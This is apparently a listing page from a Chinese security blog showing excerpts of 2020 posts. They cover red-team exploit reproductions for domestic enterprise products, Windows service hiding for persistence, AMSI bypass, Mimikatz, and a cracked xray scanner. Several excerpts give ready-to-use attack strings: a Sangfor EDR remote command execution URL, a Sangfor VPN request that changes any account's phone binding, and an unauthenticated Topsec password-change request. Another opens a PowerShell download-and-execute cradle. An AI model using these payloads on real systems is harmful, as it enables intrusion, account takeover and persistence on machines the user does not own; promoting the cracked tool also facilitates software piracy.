xray最新版1.4.2Windows&Linux&Mac 64位 社区高级版

2020-11-12 / 13 评论 / 1419 浏览 / Mrxn

首先感谢 长亭科技 提供 xray 这款非常方便非常好用的安全工具 俗话说:没有人破解的工具不是好工具 根据没有任何数据支持的统计,大部分安全研究人员使用的安全工具都是盗版 包括但不限于: IDA \ JEB \ BurpSuite \ Vmware 截至目前xray最新版的 ...

禅道≤12.4.2后台getshell漏洞复现分析

2020-10-25 / 0 评论 / 764 浏览 / Mrxn

简单的介绍下禅道: 禅道 项目管理软件 是国产的开源项目管理软件,专注研发项目管理,内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,实现了软件的完整生命周期管理。 首先搭建环境,安装禅道12.4.2,开源版下载:https://www.zentao.net/dynamic/zentaopms12.4.2-80263.htm...

蓝队技巧:查找被隐藏的Windows服务项

2020-10-23 / 0 评论 / 297 浏览 / Mrxn

在上篇,我们说过红队技巧:隐藏windows服务,今天抽空来更新下,如何查找这类隐藏的Windows服务项。 首先看下效果,使用powershell远程下载执行直接获得隐藏的Windows服务名称: 通过远程下载执行无文件落地查看隐藏Windows服务: powershell -c "IEX (New-Object Net.WebClient)....

红队技巧:隐藏windows服务

2020-10-16 / 0 评论 / 341 浏览 / Mrxn

在后渗透测试中,我们拿到了目标机器的权限后,要想办法维持权限,保持持久,嗯,很重要,不管生活还是工作都需要持久! 利用windows服务来植入我们的后门也是一种常见的利用方式,但是往往一般植入的服务很容易被管理员在任务管理器看到。如果可以隐藏的话,就大大提高了我们的持久性,今天就介绍下一种利用powershell来进行隐藏windows服务的技巧...

零组镜像打包下载 零组文章下载(截止到2020年3月的版本和2020年09月19日版本)

2020-10-14 / 0 评论 / 1201 浏览 / Mrxn

web安全 74cms ActiveMQ Adminer Adobe ColdFusion Apache Apache Dubbo Apache FusionAuth Apache HTTPD Apache Log4j Apache SS...

fastadmin(V1.0.0.20200506_beta)前台getshell(文件上传解析)漏洞分析

2020-9-21 / 0 评论 / 903 浏览 / Mrxn

0x1.简介 FastAdmin是一款基于ThinkPHP和Bootstrap的极速后台开发框架。 补天平台介绍:近日,补天漏洞响应平台监测到互联网上出现Fastadmin文件上传漏洞,exp被公开。该漏洞源于网络系统或产品的代码开发过程中存在设计或实现不当的问题,可导致文件上传并解析为可执行文件。目前厂商已发布新版本修复此漏洞,补...

深信服VPN 修改任意账户绑定手机号

2020-9-18 / 0 评论 / 589 浏览 / Mrxn

https://路径/por/changetelnum.csp?apiversion=1newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1 注意 需要登录之后才可以阅读全文>...

CVE-2020-1472: NetLogon特权提升漏洞(接管域控制器)

2020-9-15 / 0 评论 / 918 浏览 / Mrxn

0x01 更新概览 2020年09月14日,360CERT监测发现 secura 公开了针对该漏洞研究报告及PoC,可造成 权限提升影响。本次更新标识该漏洞的利用工具公开,并可能在短时间内出现攻击态势。 具体更新详情可参考: 漏洞验证 0x02 漏洞简述 2020年08月12日, 360CERT监测发现 W...

HW截至目前已经确认的漏洞和预警的漏洞(0day)汇总

2020-9-12 / 0 评论 / 1602 浏览 / Mrxn

截至到目前已经确认的漏洞一览图: 1、绿盟UTS综合威胁探针管理员任意登录 2、用友GRP-u8 XXE注入 3、天融信TopApp-LB 负载均衡系统sql注入 4、深信服EDR远程命令执行 5、联软科技产品存在任意文件上传 6、联软科技产品存在命令执行漏洞 ...

泛微OA云桥任意文件读取漏洞

2020-9-12 / 0 评论 / 757 浏览 / Mrxn

泛微0A的这个漏洞利用/wxjsapi/saveYZJFile接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件危害可见。 1、downloadUrl参数修改成需要获取文件的绝对路径,记录返回包中的id值。 2、通过查看文件接口访...

天融信数据防泄漏系统越权修改管理员密码

2020-9-11 / 0 评论 / 457 浏览 / Mrxn

无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任意用户密码。:默认superman账户uid为1。 POST /?module=auth_user&action=mod_edit_pwd ...

齐治堡垒机前台远程命令执行漏洞

2020-9-11 / 0 评论 / 695 浏览 / Mrxn

齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835) 未授权无需登录。 1、访问 http://10.20.10.11/listener/cluster_manage.php  :返回 "OK". 2、访问如下链接即可getshell,执行成功后,生成PHP一句话马 3、/var/ww...

用友GRP-u8 注入+天融信TopApp-LB 负载均衡系统sql注入

2020-9-11 / 0 评论 / 1056 浏览 / Mrxn

用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。 该系统被曝存在命令执行漏洞,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击,漏洞细节以及相关漏洞poc如下: ...

绿盟UTS综合威胁探针管理员任意登录复现

2020-9-11 / 0 评论 / 664 浏览 / Mrxn

背景: 绿盟全流量威胁分析解决方案针对原始流量进行采集和监控,对流量信息进行深度还原、存储、查询和分析,可以及时掌握重要信息系统相关网络安全威胁风险,及时检测漏洞、病毒木马、网络攻击情况,及时发现网络安全事件线索,及时通报预警重大网络安全威胁,调查、防范和打击网络攻击等恶意行为,保障重要信息系统的网络安全。 绿盟综合威胁探针设备版本V...

HW情报之-多家安全厂商设备0day

2020-9-11 / 0 评论 / 734 浏览 / Mrxn

接情报消息,深信服EDR(新)、奇治堡垒机、联软准入、天融信Top-app LB负载均衡及绿盟UTS等设备存在0day漏洞,请各企事业单位根据资产情况,梳理本单位存在以上设备的情况,加强监控,以避免遭受攻击 恶意红队IP:http://d.zaix.ru/ntbv.txt阅读全文>>

HW弹药库之深信服EDR 3.2.21 任意代码执行漏洞分析

2020-9-10 / 0 评论 / 2681 浏览 / Mrxn

漏洞原理: dev_linkage_launch.php 为设备联动的新入口点主要是将联动的接口构造成业务统一处理的接口 主要调用 跟进 可以看到 第一个检查为  $req_url = ...

HW弹药库之你的蚁剑shell还是你的shell吗?

2020-9-6 / 1 评论 / 649 浏览 / Mrxn

HW弹药库之你的蚁剑 shell 还是你的 shell 吗?可能从你的小宝贝变成了小叛徒哦! ——蚁剑 v2.1.8.1 查看站点 cookie html解析未过滤漏洞可反向 RCE 0X0:背景 说来我等菜鸡是不会也没想过去审计这些工具源码,哪怕是开源的,都是拿来主义,大部分看官也是吧。 ...

【0day】phpStudy(小皮面板)最新版v8.1.0.7 nginx 解析漏洞

2020-9-2 / 0 评论 / 1426 浏览 / Mrxn

一、phpStudy(小皮面板)简介:phpStudy国内12年老牌公益软件,集安全,高效,功能与一体,已获得全球用户认可安装,运维也高效。支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,JAVA等100多项服务器管理功能。二、漏洞简介: 自从2019年phpStudy爆出的后门事件已经过去一段时间了,期间也没有爆出过什么漏洞,并且现在P...

HW礼盒:深信服edr RCE,天融信dlp unauth和通达OA v11.6版本RCE

2020-8-20 / 0 评论 / 1180 浏览 / Mrxn

HW礼盒,请查收:深信服edr RCE:https://ip+端口/tool/log/c.php?strip_slashes=system&host=id 即可执行命令,除上面之外,还有任意文件读取,验证码绕过,还有就是rce。任意用户登录:注:2020年08月18日,fofa是通杀,版本小于 3.2.19fofa指纹: title="SANGFOR...

绕过AMSI执行powershell脚本

2020-7-2 / 2 评论 / 987 浏览 / Mrxn

简单的演示下从老外哪里学来的bypass AMSI 的姿势,看下效果图:  阅读全文>>

更新 Invoke-Mimikatz.ps1 中的 Mimikatz 版本为最新 2.2.0 20200519 版本

2020-6-24 / 0 评论 / 1252 浏览 / Mrxn

invoke-mimikatz是什么?invoke-mimikatz是powersploit渗透测试套装中的一个powershell版本的mimikatz工具,用来抓取windows操作系统中的密码。 但是其内置的mimikatz版本过低,导致在实际使用中会多多少少的有一些问题。通过查看 https://raw.githubusercontent....

1 2 3 4 5